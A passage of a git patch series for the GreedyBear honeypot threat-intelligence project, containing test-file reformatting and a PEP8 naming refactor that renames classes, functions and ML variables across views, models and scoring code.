from greedybear.cronjobs.commands.cluster import tokenize
from . import CustomTestCase
@@ -61,6 +60,24 @@ def test_tokenize_edge_cases(self):
def test_tokenize_mixed_content(self):
"""Test mixture of various command patterns"""
- input_seq = ["ls -l;cd /home;pwd", "echo hello world", ";", "git commit -m 'update'"]
- expected = ["ls", "-l", "cd", "/home", "pwd", "echo", "hello", "world", "git", "commit", "-m", "'update'"]
+ input_seq = [
+ "ls -l;cd /home;pwd",
+ "echo hello world",
+ ";",
+ "git commit -m 'update'",
+ ]
+ expected = [
+ "ls",
+ "-l",
+ "cd",
+ "/home",
+ "pwd",
+ "echo",
+ "hello",
+ "world",
+ "git",
+ "commit",
+ "-m",
+ "'update'",
+ ]
self.assertEqual(tokenize(input_seq), expected)
diff --git a/tests/test_cowrie_extraction.py b/tests/test_cowrie_extraction.py
index 6144dc5b..87e36ff3 100644
--- a/tests/test_cowrie_extraction.py
+++ b/tests/test_cowrie_extraction.py
@@ -5,7 +5,12 @@
from unittest import TestCase
from unittest.mock import MagicMock, Mock, patch
-from greedybear.cronjobs.extraction.strategies.cowrie import CowrieExtractionStrategy, normalize_command, normalize_credential_field, parse_url_hostname
+from greedybear.cronjobs.extraction.strategies.cowrie import (
+ CowrieExtractionStrategy,
+ normalize_command,
+ normalize_credential_field,
+ parse_url_hostname,
+)
from greedybear.models import CommandSequence
diff --git a/tests/test_extraction_strategies.py b/tests/test_extraction_strategies.py
index a69a663d..c5b83f99 100644
--- a/tests/test_extraction_strategies.py
+++ b/tests/test_extraction_strategies.py
@@ -59,7 +59,11 @@ def test_processes_multiple_iocs(self, mock_iocs_from_hits):
hits = [
{"src_ip": "1.2.3.4", "dest_port": 80, "@timestamp": "2025-01-01T00:00:00"},
- {"src_ip": "5.6.7.8", "dest_port": 443, "@timestamp": "2025-01-01T00:00:00"},
+ {
+ "src_ip": "5.6.7.8",
+ "dest_port": 443,
+ "@timestamp": "2025-01-01T00:00:00",
+ },
]
self.strategy.extract_from_hits(hits)
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
index 9e1e98a9..77a218a6 100644
--- a/tests/test_extraction_utils.py
+++ b/tests/test_extraction_utils.py
@@ -2,7 +2,13 @@
from unittest.mock import Mock, patch
from greedybear.consts import DOMAIN, IP
-from greedybear.cronjobs.extraction.utils import correct_ip_reputation, get_ioc_type, iocs_from_hits, is_whatsmyip_domain, threatfox_submission
+from greedybear.cronjobs.extraction.utils import (
+ correct_ip_reputation,
+ get_ioc_type,
+ iocs_from_hits,
+ is_whatsmyip_domain,
+ threatfox_submission,
+)
from greedybear.models import FireHolList, MassScanner, WhatsMyIPDomain
from . import CustomTestCase, ExtractionTestCase
diff --git a/tests/test_ioc_processor.py b/tests/test_ioc_processor.py
index 038d79bf..b033e592 100644
--- a/tests/test_ioc_processor.py
+++ b/tests/test_ioc_processor.py
@@ -212,7 +212,10 @@ def test_deduplication(self):
result = self.processor._merge_iocs(existing, new)
- self.assertEqual(sorted(result.related_urls), ["http://a.com", "http://b.com", "http://c.com"])
+ self.assertEqual(
+ sorted(result.related_urls),
+ ["http://a.com", "http://b.com", "http://c.com"],
+ )
self.assertEqual(result.destination_ports, [80, 443, 8080])
def test_updating(self):
diff --git a/tests/test_models.py b/tests/test_models.py
index 553fc8be..ae497437 100644
--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -49,7 +49,11 @@ def test_cowrie_session_model(self):
self.assertEqual(self.cowrie_session.commands.commands, self.cmd_seq)
def test_statistics_model(self):
- self.statistic = Statistics.objects.create(source="140.246.171.141", view=viewType.ENRICHMENT_VIEW.value, request_date=self.current_time)
+ self.statistic = Statistics.objects.create(
+ source="140.246.171.141",
+ view=viewType.ENRICHMENT_VIEW.value,
+ request_date=self.current_time,
+ )
self.assertEqual(self.statistic.source, "140.246.171.141")
self.assertEqual(self.statistic.view, viewType.ENRICHMENT_VIEW.value)
self.assertEqual(self.statistic.request_date, self.current_time)
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index e1ed30bf..c30f655c 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -1,8 +1,20 @@
from datetime import datetime
from unittest.mock import Mock, patch
-from greedybear.cronjobs.repositories import CowrieSessionRepository, ElasticRepository, IocRepository, SensorRepository, get_time_window
-from greedybear.models import IOC, CommandSequence, CowrieSession, GeneralHoneypot, Sensor
+from greedybear.cronjobs.repositories import (
+ CowrieSessionRepository,
+ ElasticRepository,
+ IocRepository,
+ SensorRepository,
+ get_time_window,
+)
+from greedybear.models import (
+ IOC,
+ CommandSequence,
+ CowrieSession,
+ GeneralHoneypot,
+ Sensor,
+)
from . import CustomTestCase
@@ -228,12 +240,18 @@ def test_save_session_updates_existing(self):
session.interaction_count = 10
result = self.repo.save_session(session)
self.assertEqual(result.interaction_count, 10)
- self.assertEqual(CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count, 10)
+ self.assertEqual(
+ CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
+ 10,
+ )
session.interaction_count = original_interaction_count
result = self.repo.save_session(session)
self.assertEqual(result.interaction_count, original_interaction_count)
- self.assertEqual(CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count, original_interaction_count)
+ self.assertEqual(
+ CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
+ original_interaction_count,
+ )
def test_get_command_sequence_by_hash_returns_existing(self):
existing = self.command_sequence
@@ -361,7 +379,7 @@ def test_search_returns_ordered_list(self, mock_search_class):
mock_search.scan.return_value = iter(mock_hits)
result = list(self.repo.search(minutes_back_to_lookup=10))
- is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:]))
+ is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:], strict=False))
self.assertTrue(is_ordered)
@patch("greedybear.cronjobs.repositories.elastic.Search")
diff --git a/tests/test_rf_config.py b/tests/test_rf_config.py
index 3e66f47c..4b597a71 100644
--- a/tests/test_rf_config.py
+++ b/tests/test_rf_config.py
@@ -1,13 +1,14 @@
import json
from django.test import SimpleTestCase
+
from greedybear.cronjobs.scoring.random_forest import RFClassifier, RFRegressor
from greedybear.settings import ML_CONFIG_FILE
class TestRFConfig(SimpleTestCase):
def setUp(self):
- with open(ML_CONFIG_FILE, "r") as f:
+ with open(ML_CONFIG_FILE) as f:
self.config = json.load(f)
def test_rf_classifier_config_loading(self):
@@ -25,7 +26,11 @@ def test_rf_classifier_config_loading(self):
for key, value in params.items():
actual_value = getattr(model, key)
- self.assertEqual(actual_value, value, f"RFClassifier parameter '{key}' mismatch. Config: {value}, Model: {actual_value}")
+ self.assertEqual(
+ actual_value,
+ value,
+ f"RFClassifier parameter '{key}' mismatch. Config: {value}, Model: {actual_value}",
+ )
def test_rf_regressor_config_loading(self):
"""
@@ -38,4 +43,8 @@ def test_rf_regressor_config_loading(self):
for key, value in params.items():
actual_value = getattr(model, key)
- self.assertEqual(actual_value, value, f"RFRegressor parameter '{key}' mismatch. Config: {value}, Model: {actual_value}")
+ self.assertEqual(
+ actual_value,
+ value,
+ f"RFRegressor parameter '{key}' mismatch. Config: {value}, Model: {actual_value}",
+ )
diff --git a/tests/test_rf_models.py b/tests/test_rf_models.py
index 647e704c..ea6d4b69 100644
--- a/tests/test_rf_models.py
+++ b/tests/test_rf_models.py
@@ -2,6 +2,7 @@
import numpy as np
import pandas as pd
+
from greedybear.cronjobs.scoring.ml_model import Classifier, Regressor
from greedybear.cronjobs.scoring.random_forest import RFModel
@@ -49,11 +50,11 @@ def test_rf_classifier(self):
training_target = classifier.training_target(SAMPLE_DATA)
self.assertEqual(len(training_target), len(CLASSIFIER_TARGET))
- for a, b in zip(training_target, CLASSIFIER_TARGET):
+ for a, b in zip(training_target, CLASSIFIER_TARGET, strict=False):
self.assertEqual(a, b)
df = classifier.score(SAMPLE_DATA)
- for a, b in zip(df["mock_score"], classifier.model.predict_proba.return_value[:, 1]):
+ for a, b in zip(df["mock_score"], classifier.model.predict_proba.return_value[:, 1], strict=False):
self.assertEqual(a, b)
auc = classifier.recall_auc(df, training_target)
@@ -86,7 +87,7 @@ def test_rf_regressor(self):
training_target = regressor.training_target(SAMPLE_DATA)
self.assertEqual(len(training_target), len(REGRESSOR_TARGET))
- for a, b in zip(training_target, REGRESSOR_TARGET):
+ for a, b in zip(training_target, REGRESSOR_TARGET, strict=False):
self.assertEqual(a, b)
X_train, X_test, y_train, y_test = regressor.split_train_test(SAMPLE_DATA, training_target)
@@ -96,7 +97,7 @@ def test_rf_regressor(self):
self.assertEqual(len(X_test), len(y_test))
df = regressor.score(SAMPLE_DATA)
- for a, b in zip(df["mock_score"], regressor.model.predict.return_value):
+ for a, b in zip(df["mock_score"], regressor.model.predict.return_value, strict=False):
self.assertEqual(a, b)
auc = regressor.recall_auc(df, training_target)
diff --git a/tests/test_scoring_utils.py b/tests/test_scoring_utils.py
index 7e11a531..aed4752b 100644
--- a/tests/test_scoring_utils.py
+++ b/tests/test_scoring_utils.py
@@ -1,7 +1,14 @@
from datetime import datetime
import pandas as pd
-from greedybear.cronjobs.scoring.utils import correlated_features, date_delta, get_current_data, get_features, multi_label_encode
+
+from greedybear.cronjobs.scoring.utils import (
+ correlated_features,
+ date_delta,
+ get_current_data,
+ get_features,
+ multi_label_encode,
+)
from . import CustomTestCase
diff --git a/tests/test_serializers.py b/tests/test_serializers.py
index 9d5129cf..44b3beec 100644
--- a/tests/test_serializers.py
+++ b/tests/test_serializers.py
@@ -1,23 +1,24 @@
import random
from itertools import product
-from api.serializers import FeedsRequestSerializer, FeedsResponseSerializer
from django.test import TestCase
+from rest_framework.serializers import ValidationError
+
+from api.serializers import FeedsRequestSerializer, FeedsResponseSerializer
from greedybear.consts import PAYLOAD_REQUEST, SCANNER
from greedybear.models import IOC, GeneralHoneypot
-from rest_framework.serializers import ValidationError
class FeedsRequestSerializersTestCase(TestCase):
@classmethod
- def setUpClass(self):
+ def setUpClass(cls):
GeneralHoneypot.objects.create(
name="adbhoney",
active=True,
)
@classmethod
- def tearDownClass(self):
+ def tearDownClass(cls):
# db clean
GeneralHoneypot.objects.all().delete()
@@ -28,8 +29,16 @@ def test_valid_fields(self):
"ioc_type": ["ip", "domain", "all"],
"max_age": [str(n) for n in [1, 2, 4, 8, 16]],
"min_days_seen": [str(n) for n in [1, 2, 4, 8, 16]],
- "include_reputation": [[], ["known attacker"], ["known attacker", "mass scanner"]],
- "exclude_reputation": [[], ["known attacker"], ["known attacker", "mass scanner"]],
+ "include_reputation": [
+ [],
+ ["known attacker"],
+ ["known attacker", "mass scanner"],
+ ],
+ "exclude_reputation": [
+ [],
+ ["known attacker"],
+ ["known attacker", "mass scanner"],
+ ],
"feed_size": [str(n) for n in [100, 200, 5000, 10_000_000]],
"ordering": [field.name for field in IOC._meta.get_fields()],
"verbose": ["true", "false"],
@@ -85,14 +94,14 @@ def test_invalid_fields(self):
class FeedsResponseSerializersTestCase(TestCase):
@classmethod
- def setUpClass(self):
+ def setUpClass(cls):
GeneralHoneypot.objects.create(
name="adbhoney",
active=True,
)
@classmethod
- def tearDownClass(self):
+ def tearDownClass(cls):
# db clean
GeneralHoneypot.objects.all().delete()
diff --git a/tests/test_views.py b/tests/test_views.py
index a265b3af..03acf9b2 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -1,9 +1,10 @@
-from api.views.utils import is_ip_address, is_sha256hash
from django.conf import settings
from django.test import override_settings
-from greedybear.models import GeneralHoneypot, Statistics, viewType
from rest_framework.test import APIClient
+from api.views.utils import is_ip_address, is_sha256hash
+from greedybear.models import GeneralHoneypot, Statistics, viewType
+
from . import CustomTestCase
@@ -47,8 +48,14 @@ def test_for_vaild_registered_ip(self):
self.assertEqual(response.json()["ioc"]["general_honeypot"][1], self.ciscoasa.name) # FEEDS
self.assertEqual(response.json()["ioc"]["scanner"], self.ioc.scanner)
self.assertEqual(response.json()["ioc"]["payload_request"], self.ioc.payload_request)
- self.assertEqual(response.json()["ioc"]["recurrence_probability"], self.ioc.recurrence_probability)
- self.assertEqual(response.json()["ioc"]["expected_interactions"], self.ioc.expected_interactions)
+ self.assertEqual(
+ response.json()["ioc"]["recurrence_probability"],
+ self.ioc.recurrence_probability,
+ )
+ self.assertEqual(
+ response.json()["ioc"]["expected_interactions"],
+ self.ioc.expected_interactions,
+ )
def test_for_invalid_authentication(self):
"""Check for a invalid authentication"""
@@ -260,15 +267,15 @@ def test_400_feeds_pagination(self):
class StatisticsViewTestCase(CustomTestCase):
@classmethod
- def setUpClass(self):
- super(StatisticsViewTestCase, self).setUpClass()
+ def setUpClass(cls):
+ super().setUpClass()
Statistics.objects.all().delete()
Statistics.objects.create(source="140.246.171.141", view=viewType.FEEDS_VIEW.value)
Statistics.objects.create(source="140.246.171.141", view=viewType.ENRICHMENT_VIEW.value)
@classmethod
- def tearDownClass(self):
- super(StatisticsViewTestCase, self).tearDownClass()
+ def tearDownClass(cls):
+ super().tearDownClass()
Statistics.objects.all().delete()
def test_200_feeds_sources(self):
From 54e57317fc212aef5eebb451a5dde02cfe8fec42 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Sun, 4 Jan 2026 22:16:33 +0530
Subject: [PATCH 26/75] Refactor naming conventions to comply with PEP8
(N801/N802/N803/N806). Closes #671 (#676)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* refactor: rename viewType→ViewType and iocType→IocType (PEP8 N801)
- Renamed class viewType to ViewType
- Renamed class iocType to IocType
- Updated all imports and usages across ~20 files
- Updated models, API views, tests, and cronjobs
- Fixes naming convention violations per PEP8 N801
* refactor: rename ML variables to follow PEP8 (N803/N806) and update Ruff config
- Renamed X → x, X_train → x_train, X_test → x_test in ML code
- Updated ml_model.py: all method parameters and local variables
- Updated random_forest.py: train() method variables
- Removed N801, N802, N803, N806 from Ruff ignore list
- Migration files already excluded via extend-exclude
- Fixes PEP8 N803/N806 violations in ML scoring code
* refactor: fix remaining PEP8 naming violations (N802/N806)
- Renamed generalHoneypots → general_honeypots (3 occurrences)
- Renamed checkAuthentication → check_authentication
- Renamed checkConfiguration → check_configuration
- Updated authentication/urls.py imports and URL patterns
- Renamed X_train, X_test → x_train, x_test in test_rf_models.py
- All PEP8 N801/N802/N803/N806 violations now resolved
- Migration files remain excluded via extend-exclude in .ruff.toml
* chore: update frontend dependencies
* chore: update frontend dependencies
---
.../configurations/python_linters/.ruff.toml | 8 +--
api/views/command_sequence.py | 4 +-
api/views/cowrie_session.py | 4 +-
api/views/enrichment.py | 4 +-
api/views/general_honeypot.py | 6 +--
api/views/statistics.py | 14 ++---
authentication/urls.py | 8 +--
authentication/views.py | 4 +-
.../cronjobs/extraction/ioc_processor.py | 4 +-
greedybear/cronjobs/scoring/ml_model.py | 54 +++++++++----------
greedybear/cronjobs/scoring/random_forest.py | 10 ++--
greedybear/models.py | 10 ++--
tests/__init__.py | 10 ++--
tests/test_ioc_processor.py | 6 +--
tests/test_models.py | 8 +--
tests/test_rf_models.py | 10 ++--
tests/test_views.py | 6 +--
17 files changed, 83 insertions(+), 87 deletions(-)
diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
index fb6f0ef7..d51a6a7a 100644
--- a/.github/configurations/python_linters/.ruff.toml
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -73,14 +73,10 @@ ignore = [
"DJ012",
# E501: Allow long lines in docstrings
"E501",
- # N801/N802/N803: Allow existing naming conventions (viewType, iocType, X for ML, migration functions)
- "N801",
- "N802",
- "N803",
+
# N804: Allow 'self' in class methods for Django test compatibility
"N804",
- # N806: Allow uppercase variable names for ML conventions (X_train, X_test)
- "N806",
+
# N818: Allow existing exception naming
"N818",
# UP008: Allow explicit super() in tests for clarity
diff --git a/api/views/command_sequence.py b/api/views/command_sequence.py
index 964fc57c..a5137241 100644
--- a/api/views/command_sequence.py
+++ b/api/views/command_sequence.py
@@ -16,7 +16,7 @@
from api.views.utils import is_ip_address, is_sha256hash
from greedybear.consts import GET
-from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, viewType
+from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, ViewType
logger = logging.getLogger(__name__)
@@ -48,7 +48,7 @@ def command_sequence_view(request):
include_similar = request.query_params.get("include_similar") is not None
logger.info(f"Command Sequence view requested by {request.user} for {observable}")
source_ip = str(request.META["REMOTE_ADDR"])
- request_source = Statistics(source=source_ip, view=viewType.COMMAND_SEQUENCE_VIEW.value)
+ request_source = Statistics(source=source_ip, view=ViewType.COMMAND_SEQUENCE_VIEW.value)
request_source.save()
if not observable:
diff --git a/api/views/cowrie_session.py b/api/views/cowrie_session.py
index 8fcffcfd..ed7c9bf8 100644
--- a/api/views/cowrie_session.py
+++ b/api/views/cowrie_session.py
@@ -18,7 +18,7 @@
from api.views.utils import is_ip_address, is_sha256hash
from greedybear.consts import GET
-from greedybear.models import CommandSequence, CowrieSession, Statistics, viewType
+from greedybear.models import CommandSequence, CowrieSession, Statistics, ViewType
logger = logging.getLogger(__name__)
@@ -73,7 +73,7 @@ def cowrie_session_view(request):
logger.info(f"Cowrie view requested by {request.user} for {observable}")
source_ip = str(request.META["REMOTE_ADDR"])
- request_source = Statistics(source=source_ip, view=viewType.COWRIE_SESSION_VIEW.value)
+ request_source = Statistics(source=source_ip, view=ViewType.COWRIE_SESSION_VIEW.value)
request_source.save()
if not observable:
diff --git a/api/views/enrichment.py b/api/views/enrichment.py
index 3eca1741..b0b4ee16 100644
--- a/api/views/enrichment.py
+++ b/api/views/enrichment.py
@@ -14,7 +14,7 @@
from api.serializers import EnrichmentSerializer
from greedybear.consts import GET
-from greedybear.models import Statistics, viewType
+from greedybear.models import Statistics, ViewType
logger = logging.getLogger(__name__)
@@ -39,7 +39,7 @@ def enrichment_view(request):
serializer.is_valid(raise_exception=True)
source_ip = str(request.META["REMOTE_ADDR"])
- request_source = Statistics(source=source_ip, view=viewType.ENRICHMENT_VIEW.value)
+ request_source = Statistics(source=source_ip, view=ViewType.ENRICHMENT_VIEW.value)
request_source.save()
return Response(serializer.data, status=status.HTTP_200_OK)
diff --git a/api/views/general_honeypot.py b/api/views/general_honeypot.py
index 0c10748a..7679eb04 100644
--- a/api/views/general_honeypot.py
+++ b/api/views/general_honeypot.py
@@ -26,11 +26,11 @@ def general_honeypot_list(request):
logger.info(f"Requested general honeypots list from {request.user}.")
active = request.query_params.get("onlyActive")
honeypots = []
- generalHoneypots = GeneralHoneypot.objects.all()
+ general_honeypots = GeneralHoneypot.objects.all()
if active == "true":
- generalHoneypots = generalHoneypots.filter(active=True)
+ general_honeypots = general_honeypots.filter(active=True)
logger.info(f"Requested only active general honeypots from {request.user}")
- honeypots.extend([hp.name for hp in generalHoneypots])
+ honeypots.extend([hp.name for hp in general_honeypots])
logger.info(f"General honeypots: {honeypots} given back to user {request.user}")
return Response(honeypots)
diff --git a/api/views/statistics.py b/api/views/statistics.py
index bd3db3a9..65eb9188 100644
--- a/api/views/statistics.py
+++ b/api/views/statistics.py
@@ -10,7 +10,7 @@
from rest_framework.decorators import action
from rest_framework.response import Response
-from greedybear.models import IOC, GeneralHoneypot, Statistics, viewType
+from greedybear.models import IOC, GeneralHoneypot, Statistics, ViewType
logger = logging.getLogger(__name__)
@@ -40,11 +40,11 @@ def feeds(self, request, pk=None):
"Sources": Count(
"source",
distinct=True,
- filter=Q(view=viewType.FEEDS_VIEW.value),
+ filter=Q(view=ViewType.FEEDS_VIEW.value),
)
}
elif pk == "downloads":
- annotations = {"Downloads": Count("source", filter=Q(view=viewType.FEEDS_VIEW.value))}
+ annotations = {"Downloads": Count("source", filter=Q(view=ViewType.FEEDS_VIEW.value))}
else:
logger.error("this is impossible. check the code")
return HttpResponseServerError()
@@ -67,11 +67,11 @@ def enrichment(self, request, pk=None):
"Sources": Count(
"source",
distinct=True,
- filter=Q(view=viewType.ENRICHMENT_VIEW.value),
+ filter=Q(view=ViewType.ENRICHMENT_VIEW.value),
)
}
elif pk == "requests":
- annotations = {"Requests": Count("source", filter=Q(view=viewType.ENRICHMENT_VIEW.value))}
+ annotations = {"Requests": Count("source", filter=Q(view=ViewType.ENRICHMENT_VIEW.value))}
else:
logger.error("this is impossible. check the code")
return HttpResponseServerError()
@@ -95,8 +95,8 @@ def feeds_types(self, request):
"Cowrie": Count("name", distinct=True, filter=Q(cowrie=True)),
}
# feed_type for each general honeypot in the list
- generalHoneypots = GeneralHoneypot.objects.all().filter(active=True)
- for hp in generalHoneypots:
+ general_honeypots = GeneralHoneypot.objects.all().filter(active=True)
+ for hp in general_honeypots:
annotations[hp.name] = Count("name", Q(general_honeypot__name__iexact=hp.name.lower()))
return self.__aggregation_response_static_ioc(annotations)
diff --git a/authentication/urls.py b/authentication/urls.py
index 37563947..47c9c02f 100644
--- a/authentication/urls.py
+++ b/authentication/urls.py
@@ -13,8 +13,8 @@
RegistrationView,
ResendVerificationView,
TokenSessionsViewSet,
- checkAuthentication,
- checkConfiguration,
+ check_authentication,
+ check_configuration,
)
router = routers.DefaultRouter(trailing_slash=False)
@@ -44,10 +44,10 @@
),
path("reset-password", PasswordResetView.as_view(), name="auth_reset-password"),
path("login", LoginView.as_view(), name="auth_login"),
- path("configuration", checkConfiguration),
+ path("configuration", check_configuration),
# auth
path("", include("certego_saas.apps.auth.urls")),
path("apiaccess", APIAccessTokenView.as_view(), name="auth_apiaccess"),
- path("authentication", checkAuthentication),
+ path("authentication", check_authentication),
path("", include(router.urls)),
]
diff --git a/authentication/views.py b/authentication/views.py
index 2571949b..8e69bfda 100644
--- a/authentication/views.py
+++ b/authentication/views.py
@@ -69,13 +69,13 @@ class ResendVerificationView(rest_email_auth.views.ResendVerificationView):
@api_view([GET])
@authentication_classes([CookieTokenAuthentication])
@permission_classes([IsAuthenticated])
-def checkAuthentication(request):
+def check_authentication(request):
logger.info(f"User: {request.user}, Administrator: {request.user.is_superuser}")
return Response({"is_superuser": request.user.is_superuser}, status=status.HTTP_200_OK)
@api_view([GET])
-def checkConfiguration(request):
+def check_configuration(request):
logger.info(f"Requested checking configuration from {request.user}.")
page = request.query_params.get("page")
errors = {}
diff --git a/greedybear/cronjobs/extraction/ioc_processor.py b/greedybear/cronjobs/extraction/ioc_processor.py
index eb7a9865..286030c2 100644
--- a/greedybear/cronjobs/extraction/ioc_processor.py
+++ b/greedybear/cronjobs/extraction/ioc_processor.py
@@ -3,7 +3,7 @@
from greedybear.consts import PAYLOAD_REQUEST, SCANNER
from greedybear.cronjobs.extraction.utils import is_whatsmyip_domain
from greedybear.cronjobs.repositories import IocRepository, SensorRepository
-from greedybear.models import IOC, iocType
+from greedybear.models import IOC, IocType
class IocProcessor:
@@ -47,7 +47,7 @@ def add_ioc(self, ioc: IOC, attack_type: str, general_honeypot_name: str = None)
self.log.debug(f"not saved {ioc} because it is a sensor")
return None
- if ioc.type == iocType.DOMAIN and is_whatsmyip_domain(ioc.name):
+ if ioc.type == IocType.DOMAIN and is_whatsmyip_domain(ioc.name):
self.log.debug(f"not saved {ioc} because it is a whats-my-ip domain")
return None
diff --git a/greedybear/cronjobs/scoring/ml_model.py b/greedybear/cronjobs/scoring/ml_model.py
index 12c1e3c9..641a7417 100644
--- a/greedybear/cronjobs/scoring/ml_model.py
+++ b/greedybear/cronjobs/scoring/ml_model.py
@@ -116,16 +116,16 @@ def score(self, df: pd.DataFrame) -> pd.DataFrame:
if missing_features:
raise ValueError(f"Missing required features: {missing_features}")
- X = df[self.features].copy()
+ x = df[self.features].copy()
for feature in MULTI_VAL_FEATURES:
- X = multi_label_encode(X, feature)
- X = self.add_missing_features(X)
+ x = multi_label_encode(x, feature)
+ x = self.add_missing_features(x)
result_df = df.copy()
- result_df[self.score_name] = self.predict(X)
+ result_df[self.score_name] = self.predict(x)
return result_df
- def recall_auc(self, X: pd.DataFrame, y: pd.DataFrame) -> float:
+ def recall_auc(self, x: pd.DataFrame, y: pd.DataFrame) -> float:
"""
Calculate the area under the recall curve for top-k predictions.
Quality metric for both, classification and regression tasks.
@@ -136,17 +136,17 @@ def recall_auc(self, X: pd.DataFrame, y: pd.DataFrame) -> float:
a quater of the dataset.
Args:
- X: The input features to generate predictions for.
+ x: The input features to generate predictions for.
y: Prediction targets.
Returns:
A score between 0 and 1, where 1 is perfect.
"""
y = y.reset_index(drop=True)
- predictions = pd.Series(self.predict(X))
+ predictions = pd.Series(self.predict(x))
ranked_data = pd.DataFrame({"target": y, "prediction": predictions}).sort_values(by="prediction", ascending=False)
total_positives = y.sum()
- max_k = len(X) // 4 # look at the first quater of predictions
+ max_k = len(x) // 4 # look at the first quater of predictions
k_values = np.linspace(0, max_k, num=SAMPLE_COUNT, dtype=np.int32, endpoint=True)
recalls = [ranked_data.head(k)["target"].sum() / total_positives for k in k_values]
area = np.trapezoid(recalls) / SAMPLE_COUNT
@@ -175,16 +175,16 @@ def training_target(self, df: pd.DataFrame) -> pd.DataFrame:
"""
@abstractmethod
- def split_train_test(self, X: pd.DataFrame, y: pd.DataFrame) -> list:
+ def split_train_test(self, x: pd.DataFrame, y: pd.DataFrame) -> list:
"""
Split data into training and test sets.
Args:
- X: Feature matrix
+ x: Feature matrix
y: Target values
Returns:
- list: (X_train, X_test, y_train, y_test) split datasets
+ list: (x_train, x_test, y_train, y_test) split datasets
"""
@abstractmethod
@@ -198,12 +198,12 @@ def train(self, df: pd.DataFrame) -> None:
"""
@abstractmethod
- def predict(self, X: pd.DataFrame) -> np.ndarray:
+ def predict(self, x: pd.DataFrame) -> np.ndarray:
"""
Generate predictions for the input features.
Args:
- X: Feature matrix containing all the required and processed features
+ x: Feature matrix containing all the required and processed features
Returns:
np.ndarray: Array of predictions with shape (n_samples,)
@@ -229,31 +229,31 @@ def training_target(self, df: pd.DataFrame) -> pd.DataFrame:
"""
return df["interactions_on_eval_day"] > 0
- def split_train_test(self, X: pd.DataFrame, y: pd.DataFrame) -> list:
+ def split_train_test(self, x: pd.DataFrame, y: pd.DataFrame) -> list:
"""
Split data into training and test sets while preserving class distribution.
Args:
- X: Feature matrix
+ x: Feature matrix
y: Binary target values
Returns:
- list: (X_train, X_test, y_train, y_test) split datasets
+ list: (x_train, x_test, y_train, y_test) split datasets
"""
- return train_test_split(X, y, test_size=0.2, stratify=y)
+ return train_test_split(x, y, test_size=0.2, stratify=y)
- def predict(self, X: pd.DataFrame) -> np.ndarray:
+ def predict(self, x: pd.DataFrame) -> np.ndarray:
"""
Generate probability predictions for the positive class.
Args:
- X: Feature matrix containing all the required and processed features
+ x: Feature matrix containing all the required and processed features
Returns:
np.ndarray: Array of probabilities for the positive class
with shape (n_samples,), values in range [0,1]
"""
- return self.model.predict_proba(X)[:, 1]
+ return self.model.predict_proba(x)[:, 1]
class Regressor(MLModel):
@@ -275,28 +275,28 @@ def training_target(self, df: pd.DataFrame) -> pd.DataFrame:
"""
return df["interactions_on_eval_day"]
- def split_train_test(self, X: pd.DataFrame, y: pd.DataFrame) -> list:
+ def split_train_test(self, x: pd.DataFrame, y: pd.DataFrame) -> list:
"""
Split data into training and test sets.
Args:
- X: Feature matrix
+ x: Feature matrix
y: Continuous target values
Returns:
- list: (X_train, X_test, y_train, y_test) split datasets
+ list: (x_train, x_test, y_train, y_test) split datasets
"""
- return train_test_split(X, y, test_size=0.2)
+ return train_test_split(x, y, test_size=0.2)
- def predict(self, X: pd.DataFrame) -> np.ndarray:
+ def predict(self, x: pd.DataFrame) -> np.ndarray:
"""
Generate numeric predictions.
Args:
- X: Feature matrix containing all the required and processed features
+ x: Feature matrix containing all the required and processed features
Returns:
np.ndarray: Array of predicted values with shape (n_samples,)
"""
- predictions = self.model.predict(X)
+ predictions = self.model.predict(x)
return np.maximum(predictions, 0)
diff --git a/greedybear/cronjobs/scoring/random_forest.py b/greedybear/cronjobs/scoring/random_forest.py
index bc293547..72c037ee 100755
--- a/greedybear/cronjobs/scoring/random_forest.py
+++ b/greedybear/cronjobs/scoring/random_forest.py
@@ -42,16 +42,16 @@ def train(self, df: pd.DataFrame) -> None:
"""
self.log.info(f"start training {self.name}")
- X = df[self.features].copy()
+ x = df[self.features].copy()
y = self.training_target(df).copy()
for feature in MULTI_VAL_FEATURES:
- X = multi_label_encode(X, feature)
+ x = multi_label_encode(x, feature)
- X_train, X_test, y_train, y_test = self.split_train_test(X, y)
+ x_train, x_test, y_train, y_test = self.split_train_test(x, y)
- self.model = self.untrained_model.fit(X_train, y_train)
- self.log.info(f"finished training {self.name} - recall AUC: {self.recall_auc(X_test, y_test):.4f}")
+ self.model = self.untrained_model.fit(x_train, y_train)
+ self.log.info(f"finished training {self.name} - recall AUC: {self.recall_auc(x_test, y_test):.4f}")
self.save()
@property
diff --git a/greedybear/models.py b/greedybear/models.py
index 88630991..77c68e33 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -6,14 +6,14 @@
from django.db import models
-class viewType(models.TextChoices):
+class ViewType(models.TextChoices):
FEEDS_VIEW = "feeds"
ENRICHMENT_VIEW = "enrichment"
COMMAND_SEQUENCE_VIEW = "command sequence"
COWRIE_SESSION_VIEW = "cowrie session"
-class iocType(models.TextChoices):
+class IocType(models.TextChoices):
IP = "ip"
DOMAIN = "domain"
@@ -43,7 +43,7 @@ class Meta:
class IOC(models.Model):
name = models.CharField(max_length=256, blank=False)
- type = models.CharField(max_length=32, blank=False, choices=iocType.choices)
+ type = models.CharField(max_length=32, blank=False, choices=IocType.choices)
first_seen = models.DateTimeField(blank=False, default=datetime.now)
last_seen = models.DateTimeField(blank=False, default=datetime.now)
days_seen = pg_fields.ArrayField(models.DateField(), blank=True, default=list)
